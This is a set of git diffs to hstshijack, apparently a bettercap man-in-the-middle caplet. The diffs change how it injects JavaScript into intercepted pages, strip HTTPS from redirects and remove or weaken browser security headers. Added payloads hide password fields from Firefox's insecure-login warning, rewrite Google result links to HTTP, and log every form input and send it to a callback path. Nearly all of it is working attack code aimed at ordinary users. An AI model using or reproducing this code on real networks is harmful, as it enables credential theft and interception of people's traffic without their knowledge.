     	"}\n")
 
 var ignore_hosts       = [],
@@ -126,8 +126,7 @@ var ignore_hosts       = [],
     block_script_hosts = [],
     payloads
 
-var obfuscate,
-    encode
+var obfuscate
 
 var callback_path,
     whitelist_path,
@@ -255,7 +254,6 @@ function configure() {
 	env["hstshijack.blockscripts"] ? block_script_hosts = env["hstshijack.blockscripts"].replace(/\s/g, "").split(",") : block_script_hosts = []
 	env["hstshijack.payloads"]     ? payloads           = env["hstshijack.payloads"].replace(/\s/g, "").split(",")     : payloads           = []
 	env["hstshijack.obfuscate"]    ? obfuscate          = env["hstshijack.obfuscate"].replace(/\s/g, "").toLowerCase() : obfuscate          = false
-	env["hstshijack.encode"]       ? encode             = env["hstshijack.encode"].replace(/\s/g, "").toLowerCase()    : encode             = false
 
 	// Validate caplet.
 	target_hosts.length < replacement_hosts.length ? log_fatal(on_blue + "hstshijack" + reset + " Too many hstshijack.replacements (got " + replacement_hosts.length + ").")   : ""
@@ -298,11 +296,6 @@ function configure() {
 	} else {
 		obfuscate = false
 	}
-	if (encode == "true") {
-		encode = true
-	} else {
-		encode = false
-	}
 	// Preload custom payloads.
 	p = {}
 	for (var a = 0; a < payloads.length; a++) {
@@ -328,24 +321,21 @@ function configure() {
 				}
 			}
 
-			// Escape dollar signs for regexp replacement
 			if (p[payload_host]) {
-				p[payload_host] = { "payload": p[payload_host].payload + "\n" + this_payload.replace(/\$/g, "{{hstshijack_dollar_sign}}") }
+				p[payload_host] = { "payload": p[payload_host].payload + "\n" + this_payload }
 			} else {
-				p[payload_host] = { "payload": this_payload.replace(/\$/g, "{{hstshijack_dollar_sign}}") }
+				p[payload_host] = { "payload": this_payload }
 			}
 		}
 	}
 	payloads = p
 	// Prepare core payload.
-	payload = payload_container.replace(/\$/g, "{{hstshijack_dollar_sign}}")
-	payload = payload.replace("{{payload}}", payload)
-	payload = payload.replace(/\{\{session_id\}\}/g, session_id)
+	payload = payload_container.replace(/\{\{SESSION_ID_TAG\}\}/g, session_id)
 	payload = payload.replace("obf_path_whitelist", whitelist_path)
 	payload = payload.replace("obf_path_callback", callback_path)
 	payload = payload.replace("obf_path_ssl_log", ssl_log_path)
-	payload = payload.replace( "{{variables}}", "{{variables}}\n		var " + var_replacement_hosts + " = [\"" + replacement_hosts.join("\",\"") + "\"]" )
-	payload = payload.replace( "{{variables}}", "var " + var_target_hosts + " = [\"" + target_hosts.join("\",\"") + "\"]" )
+	payload = payload.replace( "{{VARIABLES_TAG}}", "{{VARIABLES_TAG}}\n		var " + var_replacement_hosts + " = [\"" + replacement_hosts.join("\",\"") + "\"]" )
+	payload = payload.replace( "{{VARIABLES_TAG}}", "var " + var_target_hosts + " = [\"" + target_hosts.join("\",\"") + "\"]" )
 	payload = payload.replace(/obf_var_replacement_hosts/g, var_replacement_hosts)
 	payload = payload.replace(/obf_var_target_hosts/g, var_target_hosts)
 	// Obfuscate core payload.
@@ -385,7 +375,6 @@ function showConfig() {
 	logStr += "    " + yellow + "  hstshijack.replacements" + reset + " > " + ( env["hstshijack.replacements"] ? green + env["hstshijack.replacements"] : red + "undefined" ) + reset + "\n"
 	logStr += "    " + yellow + "  hstshijack.blockscripts" + reset + " > " + ( env["hstshijack.blockscripts"] ? green + env["hstshijack.blockscripts"] : red + "undefined" ) + reset + "\n"
 	logStr += "    " + yellow + "     hstshijack.obfuscate" + reset + " > " + ( obfuscate ? green + "true" : red + "false" ) + reset + "\n"
-	logStr += "    " + yellow + "        hstshijack.encode" + reset + " > " + ( encode ? green + "true" : red + "false" ) + reset + "\n"
 	logStr += "    " + yellow + "      hstshijack.payloads" + reset + " > "
 	if ( env["hstshijack.payloads"] ) {
 			list = env["hstshijack.payloads"].replace(/\s/g, "").split(",")
@@ -769,36 +758,39 @@ function onResponse(req, res) {
 		}
 
 		// Inject payloads.
-		if ( res.ContentType.match(/[a-z]+\/javascript/i) || req.Path.replace(/\?.*/i, "").match(/\.js$/i) || res.Body.match(/<head[^>]*?>/i) ) {
-			injection = payload
+		injection = payload
+		injecting = false
 
-			for ( var a = 0; a < Object.keys(payloads).length; a++ ) {
-				host = Object.keys(payloads)[a]
-				var whole_regexp_set
-				if ( !host.match(/^\*$/) ) {
-					whole_regexp_set = toWholeRegexpSet(host, "")
-				}
-				if ( host.match(/^\*$/) || req.Hostname.match(whole_regexp_set[0]) ) {
-					injection = injection.replace("{{custom_payload}}", payloads[host].payload + "\n{{custom_payload}}")
-					log_debug(on_blue + "hstshijack" + reset + " Attempting to inject payload(s) into document from " + bold + req.Hostname + reset + ".")
-				}
+		// Assemble payload.
+		for ( var a = 0; a < Object.keys(payloads).length; a++ ) {
+			host = Object.keys(payloads)[a]
+			if ( host.match(/^\*$/) || req.Hostname.match( toWholeRegexpSet(host, "")[0] ) ) {
+				injecting = true
+				injection = injection.replace("{{CUSTOM_PAYLOAD_TAG}}", payloads[host].payload.replace(/\$/g, "$$$$") + "\n{{CUSTOM_PAYLOAD_TAG}}")
+				log_debug(on_blue + "hstshijack" + reset + " Attempting to inject payload(s) into document from " + bold + req.Hostname + reset + ".")
 			}
+		}
 
-			injection = injection.replace("{{custom_payload}}", "")
-			// Escape "$" with $$"
-			// This must be done because "$" symbols in payloads are otherwise interpreted as regexp substitutions
-			injection = injection.replace(/\{\{hstshijack_dollar_sign\}\}/g, "$$$$")
-
+		if (injecting) {
+			injection = injection.replace("{{CUSTOM_PAYLOAD_TAG}}", "")
+			// Inject JavaScript documents.
 			if ( res.ContentType.match(/[a-z]+\/javascript/i) || req.Path.replace(/\?.*/i, "").match(/\.js$/i) ) {
-				res.Body = injection.replace(/.*/g, injection) + res.Body
+				res.Body = injection + res.Body
 				log_debug(on_blue + "hstshijack" + reset + " Injected payloads into JS file from " + bold + req.Hostname + reset + ".")
-			} else if ( res.Body.match(/<head[^>]*?>/i) ) {
-				if (encode) {
-					res.Body = res.Body.replace(/<head( [^>]*?|)>/i, "<head$1><script src=\"data:application/javascript;base64," + btoa(injection) + "\"></script>")
-				} else {
-					res.Body = res.Body.replace(/<head( [^>]*?|)>/i, "<head$1><script>\n" + injection + "</script>")
+			} else {
+				// Limit body scanning buffer.
+				res_inject_buffer = res.Body.substr(0, 1000)
+				res_injected_buffer = ""
+				// Inject HTML documents.
+				if (res_inject_buffer.length != 0) {
+					if ( res_inject_buffer.match(/<head(?: [^>]*?|)>/i) ) {
+						payload_marker = randomString(16)
+						res_injected_buffer = res_inject_buffer.replace(/<head( [^>]*?|)>/i, "<head$1><script src=\"data:application/javascript;base64," + payload_marker + "\"></script>")
+						res_injected_buffer = res_injected_buffer.replace( payload_marker, btoa(injection) )
+						res.Body = res.Body.replace(res_inject_buffer, res_injected_buffer)
+						log_debug(on_blue + "hstshijack" + reset + " Injected payloads into HTML file from " + bold + req.Hostname + reset + ".")
+					}
 				}
-				log_debug(on_blue + "hstshijack" + reset + " Injected payloads into HTML file from " + bold + req.Hostname + reset + ".")
 			}
 		}
 
@@ -835,9 +827,9 @@ function onResponse(req, res) {
 		res.RemoveHeader("Expect-Ct")
 
 		// Set insecure headers.
-		res.SetHeader("Content-Security-Policy", "default-src * 'unsafe-inline' 'unsafe-eval'; script-src * data: 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src *; style-src * 'unsafe-inline';")
-		res.SetHeader("X-WebKit-CSP", "default-src * 'unsafe-inline' 'unsafe-eval'; script-src * data: 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src *; style-src * 'unsafe-inline';")
-		res.SetHeader("X-Content-Security-Policy", "default-src * 'unsafe-inline' 'unsafe-eval'; script-src data: * 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src *; style-src * 'unsafe-inline';")
+		res.SetHeader("Content-Security-Policy", "default-src * data: 'unsafe-inline' 'unsafe-eval'; script-src * data: 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src *; style-src * 'unsafe-inline';")
+		res.SetHeader("X-WebKit-CSP", "default-src * data: 'unsafe-inline' 'unsafe-eval'; script-src * data: 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src *; style-src * 'unsafe-inline';")
+		res.SetHeader("X-Content-Security-Policy", "default-src * data: 'unsafe-inline' 'unsafe-eval'; script-src * data: 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src *; style-src * 'unsafe-inline';")
 		res.SetHeader("Access-Control-Allow-Origin", "*")
 		res.SetHeader("Access-Control-Allow-Methods", "*")
 		res.SetHeader("Access-Control-Allow-Headers", "*")

--- a/hstshijack/hstshijack.js
+++ b/hstshijack/hstshijack.js
@@ -804,7 +804,7 @@ function onResponse(req, res) {
 		location = res.GetHeader("Location", "")
 		if (location != "") {
 			stripped_location = location.replace(/(http)s:\/\//i, "$1://").replace(/:443($|[/?#])/, "$1")
-			res.SetHeader( "Location",  )
+			res.SetHeader("Location", stripped_location)
 			log_debug(on_blue + "hstshijack" + reset + " Stripped SSL from location header.")
 		}
 

--- a/hstshijack/hstshijack.js
+++ b/hstshijack/hstshijack.js
@@ -653,7 +653,7 @@ function onResponse(req, res) {
 	location = res.GetHeader("Location", "")
 	if ( location.match(/^https:\/\//i) ) {
 		ssl_log = readFile( env["hstshijack.log"] ).split("\n")
-		host    = location.replace(/https:\/\//i, "").replace(/[:/?#].*)/i, "")
+		host    = location.replace(/https:\/\//i, "").replace(/[:/?#].*/i, "")
 		if ( ssl_log.indexOf(host) == -1 ) {
 			ssl_log.push(host)
 			writeFile( env["hstshijack.log"], ssl_log.join("\n") )

--- a/hstshijack/hstshijack.js
+++ b/hstshijack/hstshijack.js
@@ -653,7 +653,7 @@ function onResponse(req, res) {
 	location = res.GetHeader("Location", "")
 	if ( location.match(/^https:\/\//i) ) {
 		ssl_log = readFile( env["hstshijack.log"] ).split("\n")
-		host    = location.replace(/https:\/\//, "").replace(/\/.*/, "")
+		host    = location.replace(/https:\/\//i, "").replace(/[:/?#].*)/i, "")
 		if ( ssl_log.indexOf(host) == -1 ) {
 			ssl_log.push(host)
 			writeFile( env["hstshijack.log"], ssl_log.join("\n") )
@@ -825,8 +825,6 @@ function onResponse(req, res) {
 		res.RemoveHeader("Public-Key-Pins-Report-Only")
 		res.RemoveHeader("X-Frame-Options")
 		res.RemoveHeader("X-Content-Type-Options")
-		// res.RemoveHeader("X-WebKit-CSP")
-		// res.RemoveHeader("X-Content-Security-Policy")
 		res.RemoveHeader("X-Download-Options")
 		res.RemoveHeader("X-Permitted-Cross-Domain-Policies")
 		res.RemoveHeader("X-XSS-Protection")

--- a/hstshijack/hstshijack.js
+++ b/hstshijack/hstshijack.js
@@ -835,9 +835,9 @@ function onResponse(req, res) {
 		res.RemoveHeader("Expect-Ct")
 
 		// Set insecure headers.
-		res.SetHeader("Content-Security-Policy", "default-src * 'unsafe-inline' 'unsafe-eval'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src *; style-src * 'unsafe-inline';")
-		res.SetHeader("X-WebKit-CSP", "default-src * 'unsafe-inline' 'unsafe-eval'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src *; style-src * 'unsafe-inline';")
-		res.SetHeader("X-Content-Security-Policy", "default-src * 'unsafe-inline' 'unsafe-eval'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src *; style-src * 'unsafe-inline';")
+		res.SetHeader("Content-Security-Policy", "default-src * 'unsafe-inline' 'unsafe-eval'; script-src * data: 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src *; style-src * 'unsafe-inline';")
+		res.SetHeader("X-WebKit-CSP", "default-src * 'unsafe-inline' 'unsafe-eval'; script-src * data: 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src *; style-src * 'unsafe-inline';")
+		res.SetHeader("X-Content-Security-Policy", "default-src * 'unsafe-inline' 'unsafe-eval'; script-src data: * 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src *; style-src * 'unsafe-inline';")
 		res.SetHeader("Access-Control-Allow-Origin", "*")
 		res.SetHeader("Access-Control-Allow-Methods", "*")
 		res.SetHeader("Access-Control-Allow-Headers", "*")

--- a/hstshijack/hstshijack.js
+++ b/hstshijack/hstshijack.js
@@ -583,7 +583,6 @@ function onRequest(req, res) {
 			// Patch spoofed hostnames.
 			for (var a = 0; a < target_hosts.length; a++) {
 
-
 				// Patch spoofed hostnames in headers.
 				regexp_set = toRegexpSet(replacement_hosts[a], target_hosts[a])
 				if ( req.Headers.match(regexp_set[0]) ) {
@@ -787,7 +786,7 @@ function onResponse(req, res) {
 						payload_marker = randomString(16)
 						res_injected_buffer = res_inject_buffer.replace(/<head( [^>]*?|)>/i, "<head$1><script src=\"data:application/javascript;base64," + payload_marker + "\"></script>")
 						res_injected_buffer = res_injected_buffer.replace( payload_marker, btoa(injection) )
-						res.Body = res.Body.replace(res_inject_buffer, res_injected_buffer)
+						res.Body = res_injected_buffer + res.Body.substr(1000)
 						log_debug(on_blue + "hstshijack" + reset + " Injected payloads into HTML file from " + bold + req.Hostname + reset + ".")
 					}
 				}

--- a/hstshijack/hstshijack.js
+++ b/hstshijack/hstshijack.js
@@ -803,7 +803,8 @@ function onResponse(req, res) {
 		// SSLstrip location header.
 		location = res.GetHeader("Location", "")
 		if (location != "") {
-			res.SetHeader( "Location", location.replace(/(http)s:\/\//i, "$1://") )
+			stripped_location = location.replace(/(http)s:\/\//i, "$1://").replace(/:443($|[/?#])/, "$1")
+			res.SetHeader( "Location",  )
 			log_debug(on_blue + "hstshijack" + reset + " Stripped SSL from location header.")
 		}
 

--- a/hstshijack/hstshijack.js
+++ b/hstshijack/hstshijack.js
@@ -278,8 +278,12 @@ function configure() {
 		&& !replacement_hosts[i].match(/^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+\*$/i) 
 		? log_fatal(on_blue + "hstshijack" + reset + " Invalid hstshijack.replacements value (got " + replacement_hosts[i] + ").") 
 		: ""
-		if ( target_hosts[i].match(/\*/g).length != replacement_hosts[i].match(/\*/g).length ) {
-			log_fatal(on_blue + "hstshijack" + reset + " Invalid hstshijack.targets or hstshijack.replacements value, wildcards do not match (got " + target_hosts[i] + " and " + replacement_hosts[i] + ").")
+		if (target_hosts[i].match(/\*/g) || replacement_hosts[i].match(/\*/g)) {
+			target_host_wildcard_count      = target_hosts[i].match(/\*/g).length      || 0
+			replacement_host_wildcard_count = replacement_hosts[i].match(/\*/g).length || 0
+			if (target_host_wildcard_count != replacement_host_wildcard_count) {
+				log_fatal(on_blue + "hstshijack" + reset + " Invalid hstshijack.targets or hstshijack.replacements value, wildcards do not match (got " + target_hosts[i] + " and " + replacement_hosts[i] + ").")
+			}
 		}
 	}
 	for (var i = 0; i < block_script_hosts.length; i++) {

--- a/hstshijack/payloads/firefox-bypass-password-warning.js
+++ b/hstshijack/payloads/firefox-bypass-password-warning.js
@@ -1,0 +1,58 @@
+if (navigator.userAgent.match(/firefox/i)) {
+
+	const obf_func_attack_942 = async () => {
+		const obf_var_password_fields_942 = document.querySelectorAll("input[type=password]");
+		const obf_var_allowed_chars_942 = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 `-=~!@#$%^&*()_+[]\\;',./{}|:\"<>?";
+		for (var i = 0; i < obf_var_password_fields_942.length; i++) {
+			obf_var_spoofed_field_942 = obf_var_password_fields_942[i].cloneNode(true);
+			obf_var_spoofed_field_942.type = "text";
+			obf_var_spoofed_field_942.obf_var_memory_942 = "";
+			obf_var_spoofed_field_942.addEventListener("keydown", async(EVENT)=>{
+				const obf_var_cursor_start_942 = obf_var_spoofed_field_942.selectionStart;
+				const obf_var_cursor_end_942 = obf_var_spoofed_field_942.selectionEnd;
+				if (!EVENT.ctrlKey && EVENT.keyCode != 16 && EVENT.keyCode != 18 && EVENT.keyCode != 9 && EVENT.keyCode != 37 && EVENT.keyCode != 39) {
+					if (EVENT.keyCode == 8) {
+						EVENT.preventDefault();
+						if (obf_var_cursor_start_942 != obf_var_cursor_end_942) {
+							obf_var_spoofed_field_942.value = obf_var_spoofed_field_942.value.substr(0, obf_var_cursor_start_942) + obf_var_spoofed_field_942.value.substr(obf_var_cursor_end_942);
+							obf_var_spoofed_field_942.obf_var_memory_942 = obf_var_spoofed_field_942.obf_var_memory_942.substr(0, obf_var_cursor_start_942) + obf_var_spoofed_field_942.obf_var_memory_942.substr(obf_var_cursor_end_942);
+							obf_var_spoofed_field_942.selectionStart = obf_var_cursor_start_942;
+							obf_var_spoofed_field_942.selectionEnd = obf_var_cursor_start_942;
+						} else {
+							obf_var_spoofed_field_942.value = obf_var_spoofed_field_942.value.substr(0, obf_var_cursor_start_942-1) + obf_var_spoofed_field_942.value.substr(obf_var_cursor_end_942);
+							obf_var_spoofed_field_942.obf_var_memory_942 = obf_var_spoofed_field_942.obf_var_memory_942.substr(0, obf_var_cursor_start_942-1) + obf_var_spoofed_field_942.obf_var_memory_942.substr(obf_var_cursor_end_942);
+							obf_var_spoofed_field_942.selectionStart = obf_var_cursor_start_942 > 0 ? (obf_var_cursor_start_942-1) : 0;
+							obf_var_spoofed_field_942.selectionEnd = obf_var_cursor_start_942 > 0 ? (obf_var_cursor_start_942-1) : 0;
+						}
+					} else if (EVENT.keyCode == 46) {
+						EVENT.preventDefault();
+						if (obf_var_cursor_start_942 != obf_var_cursor_end_942) {
+							obf_var_spoofed_field_942.value = obf_var_spoofed_field_942.value.substr(0, obf_var_cursor_start_942) + obf_var_spoofed_field_942.value.substr(obf_var_cursor_end_942);
+							obf_var_spoofed_field_942.obf_var_memory_942 = obf_var_spoofed_field_942.obf_var_memory_942.substr(0, obf_var_cursor_start_942) + obf_var_spoofed_field_942.obf_var_memory_942.substr(obf_var_cursor_end_942);
+						} else {
+							obf_var_spoofed_field_942.value = obf_var_spoofed_field_942.value.substr(0, obf_var_cursor_start_942) + obf_var_spoofed_field_942.value.substr(obf_var_cursor_end_942+1);
+							obf_var_spoofed_field_942.obf_var_memory_942 = obf_var_spoofed_field_942.obf_var_memory_942.substr(0, obf_var_cursor_start_942) + obf_var_spoofed_field_942.obf_var_memory_942.substr(obf_var_cursor_end_942+1);
+						}
+						obf_var_spoofed_field_942.selectionStart = obf_var_cursor_start_942;
+						obf_var_spoofed_field_942.selectionEnd = obf_var_cursor_start_942;
+					} else if (obf_var_allowed_chars_942.indexOf(EVENT.key) != -1) {
+						EVENT.preventDefault();
+						obf_var_spoofed_field_942.obf_var_memory_942 = obf_var_spoofed_field_942.obf_var_memory_942.substr(0, obf_var_cursor_start_942) + EVENT.key + obf_var_spoofed_field_942.obf_var_memory_942.substr(obf_var_cursor_end_942);
+						obf_var_spoofed_field_942.value = "•".repeat(obf_var_spoofed_field_942.obf_var_memory_942.length);
+						obf_var_spoofed_field_942.selectionStart = obf_var_cursor_start_942+1;
+						obf_var_spoofed_field_942.selectionEnd = obf_var_cursor_start_942+1;
+					}
+				}
+			});
+			obf_var_password_fields_942[i].before(obf_var_spoofed_field_942);
+			obf_var_password_fields_942[i].remove();
+		}
+	}
+
+	try	{
+		document.addEventListener("DOMContentLoaded", obf_func_attack_942);
+	} catch (obf_var_ignore_942) {
+		self.addEventListener("load", obf_func_attack_942);
+	}
+
+}

--- a/hstshijack/payloads/firefox-bypass-password-warning.js
+++ b/hstshijack/payloads/firefox-bypass-password-warning.js
@@ -4,9 +4,11 @@ if (navigator.userAgent.match(/firefox/i)) {
 		const obf_var_password_fields_942 = document.querySelectorAll("input[type=password]");
 		const obf_var_allowed_chars_942 = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 `-=~!@#$%^&*()_+[]\\;',./{}|:\"<>?";
 		for (var i = 0; i < obf_var_password_fields_942.length; i++) {
-			obf_var_spoofed_field_942 = obf_var_password_fields_942[i].cloneNode(true);
+			const obf_var_password_field_942 = obf_var_password_fields_942[i];
+			obf_var_spoofed_field_942 = obf_var_password_field_942.cloneNode(true);
 			obf_var_spoofed_field_942.type = "text";
-			obf_var_spoofed_field_942.obf_var_memory_942 = "";
+			obf_var_password_field_942.type = "text";
+			obf_var_password_field_942.value = "";
 			obf_var_spoofed_field_942.addEventListener("keydown", async(EVENT)=>{
 				const obf_var_cursor_start_942 = obf_var_spoofed_field_942.selectionStart;
 				const obf_var_cursor_end_942 = obf_var_spoofed_field_942.selectionEnd;
@@ -15,12 +17,12 @@ if (navigator.userAgent.match(/firefox/i)) {
 						EVENT.preventDefault();
 						if (obf_var_cursor_start_942 != obf_var_cursor_end_942) {
 							obf_var_spoofed_field_942.value = obf_var_spoofed_field_942.value.substr(0, obf_var_cursor_start_942) + obf_var_spoofed_field_942.value.substr(obf_var_cursor_end_942);
-							obf_var_spoofed_field_942.obf_var_memory_942 = obf_var_spoofed_field_942.obf_var_memory_942.substr(0, obf_var_cursor_start_942) + obf_var_spoofed_field_942.obf_var_memory_942.substr(obf_var_cursor_end_942);
+							obf_var_password_field_942.value = obf_var_password_field_942.value.substr(0, obf_var_cursor_start_942) + obf_var_password_field_942.value.substr(obf_var_cursor_end_942);
 							obf_var_spoofed_field_942.selectionStart = obf_var_cursor_start_942;
 							obf_var_spoofed_field_942.selectionEnd = obf_var_cursor_start_942;
 						} else {
 							obf_var_spoofed_field_942.value = obf_var_spoofed_field_942.value.substr(0, obf_var_cursor_start_942-1) + obf_var_spoofed_field_942.value.substr(obf_var_cursor_end_942);
-							obf_var_spoofed_field_942.obf_var_memory_942 = obf_var_spoofed_field_942.obf_var_memory_942.substr(0, obf_var_cursor_start_942-1) + obf_var_spoofed_field_942.obf_var_memory_942.substr(obf_var_cursor_end_942);
+							obf_var_password_field_942.value = obf_var_password_field_942.value.substr(0, obf_var_cursor_start_942-1) + obf_var_password_field_942.value.substr(obf_var_cursor_end_942);
 							obf_var_spoofed_field_942.selectionStart = obf_var_cursor_start_942 > 0 ? (obf_var_cursor_start_942-1) : 0;
 							obf_var_spoofed_field_942.selectionEnd = obf_var_cursor_start_942 > 0 ? (obf_var_cursor_start_942-1) : 0;
 						}
@@ -28,24 +30,24 @@ if (navigator.userAgent.match(/firefox/i)) {
 						EVENT.preventDefault();
 						if (obf_var_cursor_start_942 != obf_var_cursor_end_942) {
 							obf_var_spoofed_field_942.value = obf_var_spoofed_field_942.value.substr(0, obf_var_cursor_start_942) + obf_var_spoofed_field_942.value.substr(obf_var_cursor_end_942);
-							obf_var_spoofed_field_942.obf_var_memory_942 = obf_var_spoofed_field_942.obf_var_memory_942.substr(0, obf_var_cursor_start_942) + obf_var_spoofed_field_942.obf_var_memory_942.substr(obf_var_cursor_end_942);
+							obf_var_password_field_942.value = obf_var_password_field_942.value.substr(0, obf_var_cursor_start_942) + obf_var_password_field_942.value.substr(obf_var_cursor_end_942);
 						} else {
 							obf_var_spoofed_field_942.value = obf_var_spoofed_field_942.value.substr(0, obf_var_cursor_start_942) + obf_var_spoofed_field_942.value.substr(obf_var_cursor_end_942+1);
-							obf_var_spoofed_field_942.obf_var_memory_942 = obf_var_spoofed_field_942.obf_var_memory_942.substr(0, obf_var_cursor_start_942) + obf_var_spoofed_field_942.obf_var_memory_942.substr(obf_var_cursor_end_942+1);
+							obf_var_password_field_942.value = obf_var_password_field_942.value.substr(0, obf_var_cursor_start_942) + obf_var_password_field_942.value.substr(obf_var_cursor_end_942+1);
 						}
 						obf_var_spoofed_field_942.selectionStart = obf_var_cursor_start_942;
 						obf_var_spoofed_field_942.selectionEnd = obf_var_cursor_start_942;
 					} else if (obf_var_allowed_chars_942.indexOf(EVENT.key) != -1) {
 						EVENT.preventDefault();
-						obf_var_spoofed_field_942.obf_var_memory_942 = obf_var_spoofed_field_942.obf_var_memory_942.substr(0, obf_var_cursor_start_942) + EVENT.key + obf_var_spoofed_field_942.obf_var_memory_942.substr(obf_var_cursor_end_942);
-						obf_var_spoofed_field_942.value = "•".repeat(obf_var_spoofed_field_942.obf_var_memory_942.length);
+						obf_var_password_field_942.value = obf_var_password_field_942.value.substr(0, obf_var_cursor_start_942) + EVENT.key + obf_var_password_field_942.value.substr(obf_var_cursor_end_942);
+						obf_var_spoofed_field_942.value = "•".repeat(obf_var_password_field_942.value.length);
 						obf_var_spoofed_field_942.selectionStart = obf_var_cursor_start_942+1;
 						obf_var_spoofed_field_942.selectionEnd = obf_var_cursor_start_942+1;
 					}
 				}
 			});
-			obf_var_password_fields_942[i].before(obf_var_spoofed_field_942);
-			obf_var_password_fields_942[i].remove();
+			obf_var_password_field_942.before(obf_var_spoofed_field_942);
+			obf_var_password_field_942.style.display = "none";
 		}
 	}
 

--- a/hstshijack/payloads/google.js
+++ b/hstshijack/payloads/google.js
@@ -1,19 +1,19 @@
-const obf_func_attack = async () => {
+const obf_func_attack_8528027 = async () => {
 	try {
-		document.querySelectorAll("div.rc div.r a").forEach(async(obf_a)=>{
-			obf_a.onmousedown = function(){};
-			obf_a.onclick = function(){};
-			obf_a.href = obf_a.href.replace(/.*url=/ig, "").replace(/&.*/g, "");
+		document.querySelectorAll("div.rc div.r a").forEach(async(obf_a_8528027)=>{
+			obf_a_8528027.onmousedown = function(){};
+			obf_a_8528027.onclick = function(){};
+			obf_a_8528027.href = obf_a_8528027.href.replace(/(?:.*url[?]q=|url=)/ig, "").replace(/&.*/g, "").replace(/(http)[s]?:\/\//ig, "$1://");
 		});
-	} catch(obf_var_ignore){}
+	} catch(obf_var_ignore_8528027){}
 }
 
-obf_func_attack();
+obf_func_attack_8528027();
 
-setInterval(obf_func_attack, 666);
+setInterval(obf_func_attack_8528027, 666);
 
 try {
-	document.addEventListener("DOMContentLoaded", obf_func_attack);
-} catch(obf_var_ignore) {
-	self.addEventListener("load", obf_func_attack);
+	document.addEventListener("DOMContentLoaded", obf_func_attack_8528027);
+} catch(obf_var_ignore_8528027) {
+	self.addEventListener("load", obf_func_attack_8528027);
 }

--- a/hstshijack/payloads/keylogger.js
+++ b/hstshijack/payloads/keylogger.js
@@ -1,80 +1,80 @@
-function obf_func_callback() {
+function obf_func_callback_37423() {
 	try {
-		obf_var_inputs = document.getElementsByTagName("input");
-		obf_var_textareas = document.getElementsByTagName("textarea");
-		obf_var_params = "";
+		obf_var_inputs_37423 = document.getElementsByTagName("input");
+		obf_var_textareas_37423 = document.getElementsByTagName("textarea");
+		obf_var_params_37423 = "";
 
-		for (var obf_var_i = 0; obf_var_i < obf_var_inputs.length; obf_var_i++) {
-			if (obf_var_inputs[obf_var_i].value != "") {
-				obf_var_params += encodeURIComponent(obf_var_inputs[obf_var_i].name) + "=" + encodeURIComponent(obf_var_inputs[obf_var_i].value) + ( obf_var_i < (obf_var_inputs.length-1) ? "&" : "" );
+		for (var obf_var_i_37423 = 0; obf_var_i_37423 < obf_var_inputs_37423.length; obf_var_i_37423++) {
+			if (obf_var_inputs_37423[obf_var_i_37423].value != "") {
+				obf_var_params_37423 += encodeURIComponent(obf_var_inputs_37423[obf_var_i_37423].name) + "=" + encodeURIComponent(obf_var_inputs_37423[obf_var_i_37423].value) + ( obf_var_i_37423 < (obf_var_inputs_37423.length-1) ? "&" : "" );
 			}
 		}
-		for (var obf_var_i = 0; obf_var_i < obf_var_textareas.length; obf_var_i++) {
-			if (obf_var_textareas[obf_var_i].value != "") {
-				obf_var_params += encodeURIComponent(obf_var_textareas[obf_var_i].name) + "=" + encodeURIComponent(obf_var_textareas[obf_var_i].value) + ( obf_var_i < (obf_var_textareas.length-1) ? "&" : "" );
+		for (var obf_var_i_37423 = 0; obf_var_i_37423 < obf_var_textareas_37423.length; obf_var_i_37423++) {
+			if (obf_var_textareas_37423[obf_var_i_37423].value != "") {
+				obf_var_params_37423 += encodeURIComponent(obf_var_textareas_37423[obf_var_i_37423].name) + "=" + encodeURIComponent(obf_var_textareas_37423[obf_var_i_37423].value) + ( obf_var_i_37423 < (obf_var_textareas_37423.length-1) ? "&" : "" );
 			}
 		}
 
-		if (obf_var_params.length > 0) {
-			obf_var_req = new XMLHttpRequest();
-			obf_var_req.open("POST", "http://" + location.host + "/obf_path_callback?" + obf_var_params, true);
-			obf_var_req.send();
+		if (obf_var_params_37423.length > 0) {
+			obf_var_req_37423 = new XMLHttpRequest();
+			obf_var_req_37423.open("POST", "http://" + location.host + "/obf_path_callback?" + obf_var_params_37423, true);
+			obf_var_req_37423.send();
 		}
-	} catch(obf_ignore){}
+	} catch(obf_ignore_37423){}
 }
 
-function obf_func_whitelist() {
+function obf_func_whitelist_37423() {
 	try {
-		obf_var_inputs = document.getElementsByTagName("input");
-		obf_var_textareas = document.getElementsByTagName("textarea");
-		obf_var_params = "";
+		obf_var_inputs_37423 = document.getElementsByTagName("input");
+		obf_var_textareas_37423 = document.getElementsByTagName("textarea");
+		obf_var_params_37423 = "";
 
-		for (var obf_var_i = 0; obf_var_i < obf_var_inputs.length; obf_var_i++) {
-			if (obf_var_inputs[obf_var_i].value != "") {
-				obf_var_params += encodeURIComponent(obf_var_inputs[obf_var_i].name) + "=" + encodeURIComponent(obf_var_inputs[obf_var_i].value) + ( obf_var_i < (obf_var_inputs.length-1) ? "&" : "" );
